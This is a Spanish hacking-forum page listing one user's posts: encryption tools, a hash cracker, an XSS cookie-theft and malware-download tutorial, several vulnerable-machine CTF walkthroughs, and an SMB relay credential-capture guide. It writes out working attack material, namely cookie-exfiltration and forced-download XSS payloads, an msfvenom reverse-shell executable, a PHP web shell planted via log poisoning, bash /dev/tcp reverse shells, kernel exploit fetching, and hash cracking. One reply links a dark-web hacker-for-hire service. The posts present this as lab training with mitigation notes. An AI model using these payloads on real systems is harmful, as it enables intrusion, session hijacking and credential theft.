• Inicio
  • Buscar
  • Ingresar
  • Registrarse

    Samsung duplica su eficiencia en sus nuevos chips de 3 nanómetros

    • Hack x Crack - Comunidad de Seguridad informática »
    • Perfil de R3LI4NT »
    • Mostrar Mensajes »
    • Mensajes
    • Información del Perfil
      • Resumen
      • Mostrar Estadísticas
      • Mostrar Mensajes...
        • Mensajes
        • Temas
        • Adjuntos

    Mostrar Mensajes

    Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

    • Mensajes
    • Temas
    • Adjuntos

    Mensajes - R3LI4NT

    Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 22
    1
    GitHub / [AEScrypter] Cifrar y descifrar archivos con el estándar de cifrado avanzado
    « en: Julio 03, 2022, 06:17:16 am »
    AES-crypter

    AEScrypter es un script programado en python con la finalidad de cifrar todos los datos sensibles en su dispositivo con el algoritmo de cifrado AES por diferentes bloques (128, 192 y 256). Paquete desarrollado por: https://www.aescrypt.com/

    Ejemplo de cifrado de datos:
    Código: Text
    1. python3 AEScrypter.py -e <file> -b <buffersize> -p <password>
    2.  



    Ejemplo de descifrado de datos:
    Código: Text
    1. python3 AEScrypter.py -d <file> -b <buffersize> -p <password>
    2.  



    Instalación:
    Código: Text
    1. > git clone https://github.com/R3LI4NT/AEScrypter
    2.  
    3. > cd AEScrypter
    4.  
    5. > pip3 install -r requirements.txt
    6.  
    7. > sudo apt-get install shred
    8.  

    REPOSITORIO: https://github.com/R3LI4NT/AEScrypter

    2
    Criptología / Cifrar archivos con CCRYPT [TUTORIAL]
    « en: Julio 02, 2022, 09:52:54 pm »
    CCRYPT
    Cuando se trata de cifrado y descifrado de datos no se puede olvidar de Ccrypt, una herramienta super útil para proteger nuestra información sensible. Si bien es cierto que hay herramientas con GUI que hacen el cifrado de archivos como lo es Cloaker, pero también lo hay para la línea de comandos; como lo haremos en este caso.

    Esta herramienta esta basada en el cifrado belga Rijndael, mismo que es utilizado en el estándar AES por el gobierno de los EE.UU. AES utiliza un tamaño de bloque de 128 bits, pero Ccrypt utiliza un tamaño de bloque de 256 bits haciendo que sea más díficil de recuperar los archivos. Cabe recalcar que usualmente usa la extensión de archivo .cpt y permite cifrar cualquier archivo (multimedia sobre todo).

    Para instalar en debian, utilice el siguiente comando:
    Código: Text
    1. sudo apt-get install ccrypt
    2.  

    Para cifrar un archivo simplemente debemos de proporcionarle el párametro "-e" + el nombre del archivo. Les pedirá una contraseña de cifrado.
    Código: Text
    1. ccrypt -e fichero.txt
    2.  



    Como observan, el contenido del fichero es ilegible. Ahora, si quisieramos descifrarlo utilizamos el párametro "-d" + la contraseña.
    Código: Text
    1. ccrypt -d fichero.txt
    2.  



    Supongamos que tenemos un directorio con muchos archivos y queremos cifrar todos los archivos dentro de él y de subdirectorios. Entonces utilizamos el parámetro "-R" + "-e":
    Código: Text
    1. ccrypt -R -e Directorio
    2.  




    Y para descifrarlo sería lo inverso:
    Código: Text
    1. ccrypt -R -d Directorio
    2.  

    ¿Cómo cambiamos la contraseña de cifrado? para ello utilizamos el parámetro "-x". Recuerden que si cifraron todos los archivos de un directorio, entonces deben de acompañar el "-x" + "-R". Escriben la contraseña anterior y luego la nueva.



    Ahora, si solo quisiéramos que muestre el contenido del archivo pero sin que la extensión sea modificada, es decir, se muestre en la terminal el contenido. Entonces utilizamos el parámetro "-c", esto solo funciona con ficheros .TXT, en un audio o video no sería el caso.
    Código: Text
    1. ccrypt -c fichero.txt
    2.  



    Ccrypt también incluye un menú de ayuda --> ccrypt --help


    #R3LI4NT

    3
    Hacking / Re:Fichero Comprimido 7z
    « en: Julio 01, 2022, 11:34:57 pm »
    Citar
    He intentado contactar en la dark web (con medios de proteccion) con algun hacker, mandado mail para ver si me pueden ayudar (pagando, evidentemente). No he conseguido respuesta

    No has buscado bien entonces, la dark web es extensa y hay más estafadores que hackers ofreciendo servicios.

    Servicios de Hacker-Man: http://tormarkerr6otph7qhs4bs6f32apsnrd4zz3j6px2hl6534hgrtsxhqd.onion/hacker-man

    4
    GitHub / [hashCrack] Cracking de hashes
    « en: Julio 01, 2022, 04:46:30 am »
    hash-CRACK

    Características:
      - Soporta MD5, SHA1, SHA256, SHA-224, SHA384, SHA512, SHA3-224, SHA3-256, SHA3-384, SHA3-512
      - Puede guardar los hashes en un archivo



    Instalación:
    Código: Text
    1. > git clone https://github.com/R3LI4NT/hashCrack
    2.  
    3. > cd hashCrack
    4.  
    5. > pip3 install -r requirements.txt
    6.  

    Para saber como funciona deben recurrir al repositorio donde se específica cada parámetro: https://github.com/R3LI4NT/hashCrack

    EJEMPLO: MD5 hash Cracking
    Código: Python
    1. python3 hashcrack.py --md5 <hash> --wordlist <wordlist> --output <filename>
    2.  




    #R3LI4NT

    5
    Hacking web / Ataque de XSS y secuestro de cookies en página web [TUTORIAL]
    « en: Junio 27, 2022, 05:17:26 am »
    ¿Qué es 'XSS'?
    Cross-Site Scripting (XSS) es uno de los ataques más conocidos y explotados en entornos web, forma parte de las 10 vulnerabilidades más frecuentes en aplicaciones web desde 2014, algunas estadísticas afirman que el 70% de los sitios web tienen al menos una vulnerabilidad de XSS. Este ataque se aprovecha de fallas de seguridad de sitios y aplicaciones web ya que permite a un atacante cargar scripts maliciosos en un sitio web del lado del navegador para que un usuario desprevenido visite el sitio y sea infectado, tal como robar sus cookies (credenciales), realizar un defacement, cargar un código malicioso para obtener sesión de la máquina víctima o simplemente redirreccionar al usuario a otro sitio maliciosos (phishing).

    ¿Cómo se inyecta el script malicioso?
    Normalmente el atacante lo que hace es buscar una entrada de datos en el sitio web, como puede ser un simple input de búsqueda o formularios/campos de comentarios, así como en la misma URL con un payload precargado.

    Tipos de ataques de Croo-Site Scripting
    Existen tres tipos de vectores de XSS.

    XSS indirecto (reflejado): Es el tipo de ataque más común, el atacante inyecta el script en el sitio web y esté es ejecutado cuando el usuario hace una petición al servidor web, es entonces cuando se carga el script y se muestra como un mensaje de error. Por el lado de la víctima se mostrará dicho mensaje y que deberá hacer clic en el enlace que se le indique, ejecutando así el código malicioso y descargando el malware en su equipo.

    XSS directo (persistente): En este caso, el ataque persistente infecta todas las respuestas HTTP a través de la carga maliciosa por parte del atacante, la diferencia con el reflejado es que en este no es necesario atraer a la víctima y redireccionarla con un enlace. Lo único que tiene que hacer es esperar que está haga clic sobre algún campo de comentario y el hackeo se produce automático, o mejor dicho, de forma pasiva.

    XSS basado en DOM: El tercer ataque intenta escabullirse lo más que pueda, volviéndola difícil de detectar si no se profundiza el código línea por línea. El payload del ataque se ejecuta en la modificación del entorno DOM en el navegador de la víctima utilizado por el código del lado del cliente original, es decir, la respuesta HTTP no cambia, pero el contenido de la página se ejecuta de manera  diferente debido a las modificaciones maliciosas del script producido en el entorno DOM.

    Si desean profundizar más acerca de estos vectores les recomiendo este PDF en español: http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG09.pdf

    DETECTAR VULNERABILIDAD XSS
    Para no meterme en problemas he descargado una máquina de vulnhub llamada "XSS AND MYSQL" de Pentester Lab para demostrar como es posible aprovecharse de esta vulnerabilidad con fines practicos.

    - PENTESTER LAB: XSS AND MYSQL: https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/



    IP host: 192.168.25.135

    Antes que nada les voy a recomendar un script de nmap para detectar posibles vectores vulnerables a XSS a través del siguiente comando:
    Código: Text
    1. nmap -p80 --script http-stored-xss.nse <TARGET>
    2.  



    O si lo prefieren pueden optar por la herramienta XSStrike:
    - https://github.com/s0md3v/XSStrike
    - USO: https://github.com/s0md3v/XSStrike/wiki/Usage

    Personalmente hay ocasiones que prefiero hacerlo manual y no causar mucho ruido, tampoco se necesita ser un experto en JavaScript pero si conocer los párametros básicos para detectar XSS, como por ejemplo el "<script>alert("Vulnerable a XSS");</script>" para mostrar un mensaje de alerta y saber si es vulnerable a XSS o no.



    Luego de hacer clic en "Submit" mostrará el mensaje de alerta.



    SECUESTRO DE COOKIES

    Definitivamente la página es vulnerable a Cross-Site Scripting, cuando otro usuario intente hacer un comentario se ejecutará la alerta anterior, pero... ¿y ahora qué? Bueno, aquí es donde hay que exprimir todo el jugo a esta vulnerabilidad. Según la web hay un panel de administración así que intentaré robar las cookies de un usuario privilegiado e iniciar sesión, y para ello usaré el siguiente script: "<script>document.write('<img src="http://192.168.1.9:8585/?'+document.cookie+' "/>");</script>". La dirección IP local es la de mi máquina (Kali) y el puerto 8080 es donde se va a escribir y almacenar la cookie.



    El mensaje de alerta se mostrará de nuevo porque ya lo había escrito para detectar el XSS, ahora lo que haremos es abrir el puerto 8585 y esperar a que un usuario inicie sesión y capturar la cookie. Para esto podemos usar Netcat o el mismísimo Python3:
    Código: Text
    1. Netcat: nc -lvnp 8585
    2. Python3: python3 -m http.server 8585
    3.  

    Pueden hacer la prueba iniciando sesión:
    User: admin
    Password: P4ssw0rd



    Cookie: u61dlmmqrsrbt612lmu4tmh0o5

    Descargamos la extensión de "Cookie Manager" en el navegador Firefox y creamos una nueva cookie.
    - Extensión: https://addons.mozilla.org/es/firefox/addon/a-cookie-manager/

    En value pegan la cookie y en la URL el sitio web.



    Recargamos la página y le damos a "Admin" y como verán iniciamos sesión en la cuenta del administrador sin necesidad de aportar ninguna credencial.



    OBTENER CONTROL DE LA MÁQUINA DEL USUARIO
    Aquí es donde viene lo peligroso, no solamente podemos hackear el sitio web, sino también cargar un software o código malicioso para que cualquier usuario que visite el sitio web descargue el malware y se infecte. Para eso es necesario utilizar otro script más malicioso aún:
    Código: Javascript
    1. <script>var software = document.createElement('a');
    2. software.href='http://192.168.1.9/documento.exe';
    3. software.download= '';
    4. document.body.appendChild(software);
    5. software.click();</script>
    6.  



    El código no es difícil de comprender, se crea una variable llamada "software" en donde se le indica que redireccione al usuario a la página (nuestra IP local) y descargue el programa malicioso (documento.exe).

    Crear archivo ejecutable malicioso con msfvenom:
    Código: [Seleccionar]
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.9 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai > /var/www/html/documento.exe

    LHOST es su IP local y el LPORT pueden cambiarlo o dejarlo tal cual, al final especifique la ruta en el directorio raíz del servidor local y finalmente el nombre del archivo.



    Abrir servidor local HTTP:
    Código: Text
    1. sudo service apache2 start
    2.  

    Cualquier usuario que entre a la página se le preguntará si desea descargar el documento y en caso de que alguien lo descargue y ejecute deberíamos de tener una terminal a escucha de conexiones por el puerto 4444.



    Código: Text
    1. nc -lvnp 4444
    2.  

    Finalmente el usuario ejecuta el documento "legítimo" y obtenemos acceso al sistema Windows 10.



    Lista de XSS payloads: https://github.com/payloadbox/xss-payload-list

    MITIGAR VULNERABILIDAD
    Por parte del administrador del sitio web se le aconseja bloquear determinados caracteres que pueden ser utilizados para introducir código malicioso, validar y verificar todos los datos de entrada que el usuario pueda ingresar como texto; así como la longitud de la misma. Implementar un WAF que impida los ataques de XSS y monitoreé el tráfico HTTP, codificar los datos de salida para los usuarios. Por parte de los usuarios mantener antivirus y navegadores actualizados.


    #R3LI4NT

    6
    Hacking Wireless / Re:Poner adaptador TL-WN722N v2/v3 en modo monitor en Kali Linux 2022
    « en: Junio 26, 2022, 12:24:53 am »
    Sí, de nuevo yo con el mismo problema. Luego de que saliera Kali Linux 2022.2 la versión del kernel (5.18.0-kali2-amd64) no me permitía poner la tarjeta en modo monitor, peor aún, ni siquiera me la reconocía luego del sudo apt dist-upgrade, llevo dos días intentando resolver el problema y ni cuento las veces que reinstale Kali.

    Hasta que finalmente pude solucionarlo con los siguientes comandos:
    Código: Text
    1. - sudo apt update
    2. - sudo apt upgrade
    3. - sudo reboot
    4. - sudo apt install bc
    5. - sudo apt-get install build-essential
    6. - sudo apt-get install libelf-dev
    7. - sudo apt-get install linux-headers-$('uname -r')
    8. - cd Desktop
    9. - git clone https://github.com/KanuX-14/rtl8188eus.git
    10. - cd rtl8188eus
    11. - sudo -i
    12. - echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"
    13. - exit
    14. - sudo reboot
    15. - cd Desktop
    16. - cd rtl8188eus
    17. - sh -c "$(curl -fsSL https://raw.githubusercontent.com/KanuX-14/rtl8188eus/v5.3.9/build.sh)"
    18.  



    Mi problema surgía luego de ejecutar "make" y "make install" el cual me devolvía el error de --> make: *** [Makefile:2058: modules]

    Edit: ahora la solución también fue compartida aquí: https://github.com/aircrack-ng/rtl8188eus/issues/64

    7
    Hacking / CTF - Tomato_1 [RESUELTO]
    « en: Junio 23, 2022, 03:01:20 am »


    Nombre de la máquina: Tomato_1
    O.S: Linux (Ubuntu)
    Nivel: Medio-Difícil
    Reto compartido en mi perfil de Github: https://github.com/R3LI4NT/ctf-retos
    Descargar desde vulnhub:  https://www.vulnhub.com/entry/tomato-1,557/

    Paso 1): Identificar la IP de la máquina host con NetDiscover.
    Código: Text
    1. netdiscover -i eth0
    2.  



    IP host: 192.168.1.10

    Paso 2): Escanear todos los puertos que estén abiertos con Nmap.
    Código: Text
    1. nmap -p- --open -sC -n -vvv 192.168.1.10
    2.  



    Puertos abiertos: [21,80,2211,8888]

    Paso 3): Detección de servicios y sistema operativo.
    Código: Text
    1. nmap -p 21,80,2211,8888 -A 192.168.1.10
    2.  



    Servidor corriendo: HTTP Apache
    O.S: Linux (Ubuntu)
    URL del servidor: http://192.168.1.10



    En el puerto 8888 se encuentra corriendo el servidor Nginx (http:192.168.1.10:8888).



    Paso 4): Enumerar archivos y directorios con Dirb.
    Código: Text
    1. dirb http://192.168.1.10 /usr/share/dirb/wordlists/common.txt
    2.  



    Directorio: http://192.168.1.10/antibot_image/

    Al inspeccionar el código del archivo info.php, indica en un comentario que es posible subir una imagen con el método GET.
    Código: Text
    1. curl http://192.168.1.10/antibot_image/antibots/info.php
    2.  



    Paso 5): Búsqueda de vulnerabilidad LFI (Inclusión de archivos locales).
    Herramienta Tester: https://github.com/kostas-pa/LFITester
    LFI Payloads: https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt

    Código: Text
    1. python3 LFITester.py -L payloads.txt
    2.  



    URL:
    Código: Text
    1. Opción 1) http://192.168.1.10/antibot_image/antibots/info.php?image=../../../../../../../../../../../../etc/passwd
    2. Opción 2) http://192.168.1.10/antibot_image/antibots/info.php?image=../../../../../../../../../../../../var/log/auth.log
    3.  

    /etc/passwd



    /var/log/auth.log



    Paso 6): Envenenar registros de Apache a través de SSH creando una backdoor por el puerto 2211.
    Código: Text
    1. ssh '<?php system($_GET['cmd']); ?>'@192.168.1.10 -p 2211
    2.  



    Paso 7): Configurar proxy y capturar solicitud GET con BurpSuite.
    Configuración de Firefox > Configuración de redes > Configuración de proxy manual
    HTTP Proxy: 127.0.0.1
    Port: 8080



    Acceder a la URL: http://192.168.1.10/antibot_image/antibots/info.php?image=../../../../../../../../../../../../var/log/auth.log&cmd=
    BurpSuite capturará la solicitud GET y a la misma se le agregará comandos extras para acceder al interior de la máquina con una reverse shell:
    Código: Text
    1. http://192.168.1.10/antibot_image/antibots/info.php?image=../../../../../../../../../../../../var/log/auth.log&cmd=bash -c 'bash -i >& /dev/tcp/192.168.1.9/4444 0>&1'
    2.  

    Reverse Shell Cheat Sheet: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet



    Antes de obtener un reverse shell, es preciso codificar los comandos extras. Convert selection > URL > URL-encode all characters
    Código: Text
    1. antibot_image/antibots/info.php?image=../../../../../../../../../../../../var/log/auth.log&cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%2e%39%2f%34%34%34%34%20%30%3e%26%31%27
    2.  



    Después, ponemos a netcat en escucha por el puerto 4444 para obtener una reverse shell:
    Código: Text
    1. nc -lvnp 4444
    2.  

    Seleccionar la URL completa desde el proxy de Burp y hacer clic en Forward para enviar la petición GET maliciosa.



    Paso 8]: Escalar privilegios: buscar exploit y descargarlo con SearchSploit.
    Versión del kernel: 4.4.0-21-generic
    Código: Text
    1. searchsploit -m 40616
    2.  



    Abrir un servidor local en el puerto 80 con Python3:
    Código: Text
    1. python3 -m http.server 5555
    2.  



    Descargar exploit en el directorio /tmp y compilar código:
    Código: Text
    1. cd /tmp
    2. wget http://192.168.1.9:5555/40616.c
    3. gcc-5 40616.c -o get_root -pthread
    4.  



    Ejecutar exploit y capturar la flag del directorio /root:
    Código: Text
    1. ./get_root
    2. cd /root
    3. cat proof.txt
    4.  



    FLAG: Sun_CSR_TEAM_TOMATO_JS_0232xx23


    #R3LI4NT

    8
    Hacking / Explotar Windows Network con envenenamiento LMMNR/NBT-NS [SMB-Relay]
    « en: Junio 20, 2022, 05:20:49 am »
    ¡Que tal gente de Hack x Crack!
    En este nuevo post voy a comentarles como un pentester o hacker ético (o blackhat e.e) puede obtener sesión remota a una máquina con Windows (con cualquier versión 7,8,8.1,10,11,etc) y hacerse administrador (root) de la máquina. Las empresas suelen ignorar este fallo y luego pasa lo que pasa... mírenlo del lado positivo, más trabajo para el pentester.

    ¿Qué son los ataques 'SMB Relay'?
    El ataque SMB Relay es un ataque muy utilizado para ganar acceso a equipos privilegiados y no privilegiados. En las redes existen sistemas automatizados que se conectan a otros equipos para realizar diversas tareas tipo: backups, actualizar antivirus y controladores, revisar inventario del software instalado y demás. Dichos sistemas para conectarse a otros equipos necesitan proveer a los mismos las credenciales válidas para llevar a cabo la autenticación. Y aquí es donde viene lo jugoso, el atacante lo que hace es interceptar las conexiones entre esos sistemas (con su dirección IP interna/local) para capturar el usuario y contraseña, en el caso de la contraseña, viajará hasheada (cifrada).

    La autenticación se realiza por medio del protocolo NTLM, mismo que contiene un hash para almacenar las contraseñas de sistemas Windows.



    Ataque intermediario (MITM) - Envenenamiento
    User A: Envía un mensaje de autenticación al User B
    Atacante: Intercepta primero el mensaje y lo pasa al User B
    User B: Recibe el mensaje y envía el desafío encriptado en un hash hacia el User A
    User A: Resuelve el desafío y lo envía hacia el User B
    Atacante: Intercepta el desafío (hash)
    User B: Decide si otorgar acceso o denegarlo.

    El atacante graba el Hash-SMB para luego crackear el login por fuerza bruta.


    EXPLOTAR WINDOWS NETWORK

    Una de las herramientas que suelo utilizar personalmente es Responder, un script hecho en python para envenenar (escuchar) las autenticaciones que viajan en la red, tales como: HTTP/SMB/MSSQL/FTP/LDAP/NTLMv1/NTLMv2/LMv2. Para descargar el repositorio ejecutan el siguiente comando:
    Código: Text
    1. git clone https://github.com/SpiderLabs/Responder
    2. cd Responder
    3.  

    Para poner en marcha las escuchas:
    Código: Text
    1. python2 Responder.py -I eth0 -w -r -f -v
    2.  

    -I: Interfaz de red
    -w: Inicie el servidor proxy no autorizado WPAD. El valor predeterminado es falso.
    -r: Habilitar las respuestas para las consultas de sufijo wredir de netbios. Responder a wredir probablemente rompa cosas en la red. Valor predeterminado: falso
    -f: Esta opción le permite tomar la huella digital de un host que emitió una consulta NBT-NS o LLMNR.
    -v: Modo verbose (más detalles).



    En mi caso, escogí Windows 7 a explotar como entorno controlado en una VM. Lo probé en mi máquina física con Windows 10 y funciono sin problemas. En Windows me dirigí a Explorador de archivos -> Acceso rápido y en la barra de búsqueda escribí //printserver, es un servidor que conecta una impresora de red al sistema que la esté autenticando.



    Del lado de la atacante, pueden observar como la herramienta ha captura el usuario y el hash de sesión:



    NTLMv2 hash:
    Código: Text
    1. Windows7::WIN-L4EQ22AUEQQ:1122334455667788:7D9F243618A9F7D0A67E33C32CAD0F6D:01010000000000007B1A5D1F4184D80165B72B4E1C351E52000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000042D1DCB967E565082DB9764DD27D0466D49D29CCB6AE09136F0E9AF0C8420BA60A001000000000000000000000000000000000000900200048005400540050002F007000720069006E0074007300650072007600650072000000000000000000
    2.  

    Luego, creó un nuevo documento de texto en donde almacenaré el hash, posteriormente usaré John The Ripper para crackear dicho hash:
    Código: Text
    1. john --wordlist='diccionario' 'hash_almacenado.txt'
    2.  



    Si su máquina cuenta con un procesador de alto rendimiento, entonces opten a utilizar hashcat para crackear el login:
    Código: Text
    1. hashcat -m 5600 'hash_almacenado.txt' 'diccionario.txt'
    2.  

    5600 es el identificador del hash NTLMv2.



    CREDENCIALES DE LA MÁQUINA
    Usuario: Windows7
    Contraseña: admin123

    Después me conectaré de forma remota a la máquina con el software de Rdesktop.
    Código: Text
    1. rdesktop 'IP-host'
    2.  



    ¡ACCESO OTORGADO!




    MITIGAR VULNERABILIDAD

    Lo primero que recomiendo es entrar a la configuraciones de Conexiones remota de Windows y deshabilitarla, o solo habilitarla para aquellos equipos de confianza.



    De parte de la empresa es recomendable limitar las cuentas de usuarios administradores locales y del dominio para no producir un daño mayor, también recomiendo deshabilitar la firma SMB para que el ataque no pueda funcionar.

    #R3LI4NT

    9
    Retos no oficiales / CTF - CyberSploit [RESUELTO]
    « en: Junio 19, 2022, 01:32:59 am »


    Nombre de la máquina: CyberSploit
    O.S: Linux (Ubuntu)
    Nivel: Fácil
    Reto compartido en mi perfil de Github: https://github.com/R3LI4NT/ctf-retos
    Descargar desde vulnhub:  https://www.vulnhub.com/entry/cybersploit-1,506/



    PASO 1): Identificar la IP de la máquina host con NetDiscover.
    Código: Text
    1. netdiscover -i wlan0 -r 192.168.1/24
    2.  



    IP host: 192.168.1.5

    PASO 2): Escanear todos los puertos que estén abiertos con Nmap.
    Código: Text
    1. nmap -p- --open -sC -n -vvv 192.168.1.5
    2.  



    Puertos abiertos: [22,80]

    PASO 3): Detección de servicios y sistema operativo.
    Código: Text
    1. nmap -p 22,80 -A 192.168.1.5
    2.  



    Servidor corriendo: HTTP Apache



    PASO 4): Enumerar archivos web con Dirb.
    Código: Text
    1. dirb http://192.168.1.5 -w /usr/share/dirb/wordlists/common.txt
    2.  



    Archivo: robots.txt
    Mostrar contenido del archivo con Curl:
    Código: Text
    1. curl http://192.168.1.5/robots.txt
    2.  



    Mensaje ofuscado a base64: R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

    Decodificar mensaje con Bash:
    Código: Text
    1. echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 --decode
    2.  



    PASO 5): Conectarse al servidor SSH.

    CREDENCIALES SSH
    Usuario: itsskv
    Contraseña (FLAG_1): cybersploit{youtube.com/c/cybersploit}

    Código: Text
    1. ssh [email protected]
    2.  



    Capturar la segunda flag:
    Código: Text
    1. cat /home/itsskv/flag2.txt
    2.  



    Flag ofuscada a código binario:
    Código: Text
    1. 01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
    2.  

    PASO 6): Decodificar binario.

    ONLINE: https://www.online-toolz.com/langs/es/tool-es-text-binary-convertor.html



    FLAG_2: cybersploit{https:t.me/cybersploit1}

    PASO 7): Escalar privilegios: buscar exploit con Searchsploit.



    Versión del kernel: 3.13.0-32
    Código: Text
    1. searchsploit 3.13.0
    2.  



    Descargar exploit:
    Código: Text
    1. searchsploit -m 37292
    2.  



    Abrir un servidor local en el puerto 80 con Python3:
    Código: Text
    1. python3 -m http.server 80
    2.  



    Descargar exploit en el directorio /tmp; compilar y dar permisos de escritrura, lectura y ejecucción:
    Código: Text
    1. cd /tmp
    2. wget http://192.168.1.9/37292.c
    3. gcc 37292.c -o kernel
    4. chmod 777 kernel
    5.  



    Por último, explotar el kernel ./kernel y capturar la key (flag) del fichero finalflag.txt dentro del directorio /root:
    Código: Text
    1. ./kernel
    2. cd /root
    3. cat finalflag.txt
    4.  



    FLAG_3: cybersploit{Z3X21CW42C4 many many congratulations !}

    #R3LI4NT

    10
    Hacking / CTF - Prime_1 [RESUELTO] - Preparación OSCP
    « en: Junio 14, 2022, 11:11:25 pm »


    Nombre de la máquina: Prime_1
    O.S: Linux
    Nivel: Difícil
    Reto compartido en mi perfil de Github: https://github.com/R3LI4NT/ctf-retos
    Descargar desde vulnhub:  https://www.vulnhub.com/entry/prime-1,358/


    [!] Esta máquina está diseñada para aquellos que intentan prepararse para el examen OSCP.



    PASO 1): Identificar la IP de la máquina host con NetDiscover.
    Código: Text
    1. netdiscover -i eth0
    2.  



    IP host: 192.168.25.133

    PASO 2): Escanear todos los puertos que estén abiertos con Nmap.
    Código: Text
    1. nmap -p- --open -sC -n -Pn -vvv 192.168.25.133
    2.  



    Puertos abiertos: [22,80]

    PASO 3): Escaneo agresivo para detectar servicios corriendo.
    Código: Text
    1. nmap -A 192.168.25.133
    2.  



    Servidor corriendo: HTTP Apache

    PASO 4): Recorrido de ruta: enumerar archivos .txt con Dirb.
    URL: http://192.168.25.133



    Código: Text
    1. dirb http://192.168.25.133 -X .txt
    2.  



    Archivo secreto: http://192.168.25.133/secret.txt



    Probar los comandos Fuzzing que proporciona el repositorio de Github, el objetivo es encontrar un parámetro para navegar dentro de él.
    Comando fuzzy: file



    Unir la URL: http://192.168.25.133/index.php?file=



    Archivo proporcionado: location.txt
    URL completa: http://192.168.25.133/index.php?file=location.txt



    El archivo location.txt da una pista para usar secrettire360 como parámetro en otra página php aprovechando la vulnerabilidad de inclusión de archivos locales (LFI).
    Localizar archivos .php con Dirb:
    Código: Text
    1. dirb http://192.168.25.133 -X .php
    2.  



    Pista: secrettire360
    URL completa: http://192.168.25.133/image.php?secrettier360
    Código: Text
    1. dirb http://192.168.25.133 -X .php `http://192.168.25.133/image.php?secrettier360` /usr/share/dirb/wordlists/extensions_common.txt
    2.  



    URL completa: http://192.168.25.133/image.php?secrettier360=/etc/passwd
    El usuario Saket menciona que dentro de su directorio /home/saket/ se encuentra el archivo password.txt.



    URL completa: http://192.168.25.133/image.php?secrettier360=/home/saket/password.txt



    Credenciales WordPress

    Usuario: victor
    Contraseña: follow_the_ippsec
    URL login: http://192.168.25.133/wordpress/wp-login.php



    PASO 5): Escribir código malicioso PHP.
    Apariencia > Editor de temas > secret.php



    Ruta del código PHP del reverse shell:
    Código: Text
    1. cat /usr/share/webshells/php/php-reverse-shell.php
    2.  

    Cambiar la línea $ip por la IP local de su máquina, el puerto lo establecen a 4444. Guardar cambios 'Update Files'.



    PASO 6): Obtener una reverse shell con Netcat.
    Código: Text
    1. nc -lvp 4444
    2.  

    Recargar URL: http://192.168.25.133/wordpress/wp-content/themes/twentynineteen/secret.php



    Extraer información de los ficheros user.txt y password.txt dentro del directorio /home/saket:
    Código: Text
    1. cd home && cd saket && ls
    2. cat user.txt && cat password.txt
    3.  



    PASO 7): Escalar privilegios: buscar exploit.



    Versión del kernel: 4.10.0-28-generic



    Repositorio del código: https://github.com/kkamagui/linux-kernel-exploits/blob/master/kernel-4.10.0-28-generic/CVE-2017-16995/CVE-2017-16995.c
    Copiar el código y guardarlo con la extensión kernel.c.

    Abrir un servidor local en el puerto 80 con Python3:
    Código: Text
    1. python3 -m http.server 80
    2.  



    Descargar el exploit en la ruta /tmp desde la sesión obtenida (reverse shell); compilar y dar permisos de escritura, lectura y ejecución.
    Código: Text
    1. cd /tmp
    2. wget http://192.168.1.9/kernel.c
    3. gcc kernel.c -o kernel
    4. chmod 777 kernel
    5.  



    Por último, explotar el kernel './kernel' y extraer la key (flag) del fichero root.txt dentro del directorio /root:
    Código: Text
    1. ./kernel
    2. cd /root
    3. cat root.txt
    4.  



    KEY: b2b17036da1de94cfb024540a8e7075a

    NOTA: Sí bien es sabido que podía utilizar Metasploit y ahorrarme tiempo en los pasos 6 y 7, pero en el examen OSCP esta prohibido utilizar Metasploit y se recomienda realizarlo manual para aprender del proceso que pasa por detrás :)

    #R3LI4NT

    11
    Hacking / Re:DZ Dork Gen v0.1
    « en: Junio 12, 2022, 04:56:38 pm »
    Vaya... había reportado hace unos días este post y otros de este usuario pero los administradores pasaron por alto, menos mal que apareciste tu poseidon ya me olía mal esto. Me faltaron pruebas eso sí, no cabe duda que esta "herramienta sorpresa" también este infectada con malware: https://hackxcrack.net/foro/hacking/blazing-dork/

    Y según la normativa esta prohibido añadir acortadores a los links, ya hasta denuncie el blogspot desde el sitio oficial de blogger, todas estas tools deben contener malware de seguro...

    12
    Hacking / Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
    « en: Junio 11, 2022, 09:12:39 pm »
    A fines de mayor de 2022 unos investigadores habían descubierto una vulnerabilidad de zero-day que afecta a los usuarios de Microsoft Windows y que permite a un atacante apropiarse remotamente de la máquina víctima a través de comandos maliciosos con solamente abrir un documento de Microsoft Office. Lo más alarmante es que fue descubierta mucho antes, supuestamente en abril y misma fue reportada a Microsoft, pero este se hizo la "vista gorda" y no  le dio importancia. El investigador Nao_Sec reveló en su cuenta de twitter que le había llegado un documento malicioso con un enlace externo asociado al doc para cagar el HTML y ejecutar el código PowerShell.

    Nao_Sec se encontraba probando malwares en virustotal hasta que se encontro con el siguiente fragmento de código:



    - https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection


